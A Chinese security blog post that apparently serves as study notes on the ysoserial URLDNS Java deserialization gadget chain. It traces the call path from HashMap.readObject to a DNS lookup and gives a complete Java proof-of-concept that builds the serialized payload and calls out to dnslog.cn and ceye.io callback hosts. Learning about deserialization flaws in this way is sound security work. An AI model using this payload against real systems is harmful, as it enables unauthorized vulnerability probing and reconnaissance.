URLDNS链分析

已于 2022-01-28 22:57:12 修改
阅读量2k 收藏 1
点赞数
文章标签: intellij-idea java intellij idea
于 2022-01-26 22:38:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29163073/article/details/122708355
版权

ysoserial

ysoserial
在idea构建好项目,添加依赖真是麻了,在其pom.xml上有几个依赖位置已经改变,需要手动导入jar包。。
项目准备好后,在pom.xml找到入口类
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
报错了,这是因为没有传入参数,我们分析URLDNS,在编辑配置里添加程序实参

URLDNS “http://r5z2ag.ceye.io”

在这里插入图片描述可见执行成功
在这里插入图片描述
至此能获得序列化数据

URLDNS

URLDNS是ysoserial序列化中比较简单的一个链,URLDNS的利用效果是只能触发一次dns请求,而不能去执行命令。比较适用于漏洞验证这一块,而且URLDNS这条利用链并不依赖于第三方的类,而是JDK中内置的一些类和方法,所以不受jdk版本限制

找到位于在这里插入图片描述URLDNS.java
注释里面的调用链
在这里插入图片描述
ht.put(u,url),在put打个断点,进入HashMap,找到readObject,putVal中,对key进行hash处理

在这里插入图片描述
hash方法的实现

跟进hashcode
在这里插入图片描述
跟到handler,hashcode不等于-1将传入hashcode方法,hashcode方法中还调用了handler的hashcode在这里插入图片描述进handler,transient修饰
在这里插入图片描述调用了URLStreamHandler,步进

在这里插入图片描述取得协议名称
在这里插入图片描述这个应该返回域名地址

在这里插入图片描述
在这里插入图片描述
getByName方法返回IP,会被记录到DNSLOG

总结的或许有些疏漏:
HashMap.readObject() -> HashMap.putVal()->HashMap.hash()->URL.hashcode()->URLStreamHandler().hashCode().getHostAddress->URLStreamHandler().hashCode().getHostAddress.getByName()

参考文章Exp

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class URLDNS {
    public static void main(String[] args) throws Exception {
        HashMap map = new HashMap();
        URL url = new URL("http://j0obud.dnslog.cn/");
        Class clas = Class.forName("java.net.URL");
        Field field = clas.getDeclaredField("hashCode");
        field.setAccessible(true);
        field.set(url,123);
        map.put(url,"2333");
        field.set(url,-1);
        try {
            FileOutputStream outputStream = new FileOutputStream("./2.ser");
            ObjectOutputStream outputStream1 = new ObjectOutputStream(outputStream);
            outputStream1.writeObject(map);
            outputStream.close();
            outputStream1.close();
            FileInputStream inputStream = new FileInputStream("./2.ser");
            ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
            objectInputStream.readObject();
            objectInputStream.close();
            inputStream.close();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

tips:

HashMap map = new HashMap();
URL url = new URL(“http://j0obud.dnslog.cn/”);
Class clas = Class.forName(“java.net.URL”);
Field field = clas.getDeclaredField(“hashCode”);
field.setAccessible(true);
field.set(url,123);
map.put(url,“2333”);
field.set(url,-1);

因为在生成payload的时候会发起一次DNS请求,上面代码的作用就是使刚刚分析中hashcode要不等于-1才会进入URLStreamHandler,因此我们在put方法前修改hashcode的值,put方法后再改回来就可以规避生成payload的过程中发起DNS请求

enhengzZ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
URLDNS利用链分析
m0_61506558的博客
11-28 685
URLDNSJava反序列化中比较简单的一个,由于URLDNS不需要依赖第三方的包,同时不限制jdk的版本,所以通常用于检测反序列化的点,URLDNS并不能执行命令,只能发送DNS请求。(一)原理HashMap在反序列化的时候会对传进来的对象进行hash计算获取hashCode,而URL类中的hashCode属性在特殊情况下的hashCode计算将触发dns查询(二)利用ysoserial中的URLDNS.javareturn ht;}}/****/}
[Java安全入门]三.URLDNS
qq_34942239的博客
03-07 604
readObject()->HashMap.putVal()->hash()->hashCode()(URL类)->getHostAddress()->getByName()如果传入的key是url,那么就会调用URL类里面的hashCode方法。HashMap为了保证键的唯一性,将键里面的每个元素进行计算,在类的最下面有个putVal方法,里面调用了hash方法,跟进到hash方法。在初步学习java的序列化和反序列化之后,这里学习java反序列化漏洞的一个利用,也是比较基础的一条
java反序列化之URLDNS学习
最新发布
dayouzi的博客
04-25 729
1、Java 序列化是指把 Java 对象转换为字节序列的过程。ObjectOutputStream类的 writeObject() 方法可以实现序列化。2、Java 反序列化是指把字节序列恢复为 Java 对象的过程。ObjectInputStream 类的 readObject() 方法用于反序列化。
Java安全】ysoserial-URLDNS链分析
qq_48201589的博客
02-06 1691
Java安全中经常会提到反序列化,一个将Java对象转换为字节序列传输(或保存)并在接收字节序列后反序列化为Java对象的机制,在传输(或保存)的过程中,恶意攻击者能够将传输的字节序列替换为恶意代码进而触发反序列化漏洞。其中最经典的反序列化漏洞利用工具——ysoserial,下面就分析学习一下ysoserial中的URLDNS,以便更好地理解反序列化漏洞。
URLDNS反序列化学习.doc
07-09
URLDNS反序列化学习】文档主要涉及的是Java中的一个安全问题,即URLDNS反序列化。这是一种利用Java对象序列化机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能...
分析-URL检查工具-crx插件
04-03
测定 - URL检测工具提供有关WHOIS,SubDomain,GeoIP,DNS,广告,分析,Live HTTP标头,网站档案,安全框架,页面源,页面接,Cookie,Web爬虫(Robots.txt),域图形,域名信誉和恶意软件的信息任何网站的网络...
short-url:短地址服务
04-27
(2) DNS服务器获得 IP 后,想该服务器发送 GET 请求查询 RgRjigS 短码对应的原 URL . (3) 通过 RgRjigS 查询对应原 URL, 通过重定向到原请求地址.这里可通过 301 或 302 重定向. 算法分析 (1) 32位 md5 随机串 : 将原...
DNS Checker - SEO and Domain Analysis-crx插件
04-01
通过DNS Checker的SEO和域分析工具。 提供SEO报告,元重定向和404,客户端IP,域IP和地理位置等 DNS Checker的正式扩展(DNSChecker.org)。 该扩展包括以下功能:1.域的IP和地理位置。 2.您的IP及其地理位置数据。 ...
java反序列化之URLDNS链分析
weixin_45682070的博客
11-23 556
readObject()方法 Java反序列化会调用对应的readobject方法 比如我创建一个类test。序列化test类就会调用writeobject方法, 反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法 在HashMap类中,恰恰存在readobject方法 利用: ysoserial项目的利用 * Gadget Chain: * HashMap.readObject() * HashMap.putVal()
dnsurl
lylong0703的博客
02-13 169
urldns
java url dns_Java反序列化之URLDNS链分析
weixin_42504279的博客
02-24 762
预备知识Java反序列化会调用对应的readobject方法比如我创建一个类test。序列化test类就会调用writeobject方法,反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法子分析在HashMap中。存在readobject方法。最后会调用hash(key)然后hash(key)又会调用key.hashCode方法而URL类又存在一...
Java 反序列化(二) URLDNS链分析
Vicl1fe的博客
03-24 711
前言
[Java反序列化]URLDNS链分析
Y4tacker的博客
05-25 621
文章目录结果分析利用(来自ysoserial)生成反序列化参考接 结果 成功触发 分析 利用(来自ysoserial) * HashMap.readObject() * HashMap.putVal() * HashMap.hash() * URL.hashCode() 生成 反序列化 参考接 https://zhuanlan.zhihu.com/p/149416105 https://www.cnblogs.com/v1ntlyn/p
Javaweb安全——反序列化漏洞-URLDNS
weixin_43610673的博客
05-21 487
反序列化- URLDNS 之前学过一遍Java反序列化漏洞,不过那次是从cc入手的,当时也看了好久,各种调试才搞明白。这次从调用简单的URLDNS开始从新捋一遍。 本文SDK为1.8 8u211 URLDNS ysoserial中一个利用,其触发的结果是一次DNS请求。可用于确认是否存在反序列化漏洞,因为整条均用Java内置的类构造,对第三方库没有依赖。 先来看看ysoserial当中的实现代码 public class URLDNS implements ObjectPayload<Obj
Java代码审计:Java反序列化入门之URLDNS
god_Zeo的安全博客
08-19 1243
0x00 前言 自学Java 代码审计,主要自己一个人学习,有点闭门造车,搜索引擎学习法,但是还是记录一下,也分享一下,也便于将来的总结和反思,如果我能终能学到什么,我也会重新梳理思路,为那些自学者提供一个好的思路,所以有了下面的系列文章java代码审计自学篇。 之前研究了,但是没有整理好,因为有hvv任务,所以推迟了一些,现在赶紧整理发出来。 0x01 Java反序列化介绍 Java反序列化漏洞的产生原因: 简单的说就是,在于开发者在重写 readObject 方法的时候,写入了漏洞代码。 序列化和反序列
URLDNS的gadget
公众号shadow sock7
07-04 565
调用过程: java\util\HashMap#readObject(java.io.ObjectInputStream s) java\util\HashMap#hash(Object key) 获取key(这里是URL)的hashCode java\net\URL#hashCode java\net\URLStreamHandler#hashCode(URL u) 调用栈: <init>:102, Inet4Address (java.net) lookupAllHostAddr:
域名解析与dns协议分析
09-14
域名解析和DNS协议分析是互联网中非常重要的两个概念。 域名解析是指将域名转换为对应的IP地址的过程。当我们在浏览器中输入一个域名时,计算机首先需要将这个域名解析为对应的IP地址,然后才能与服务器进行通信。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值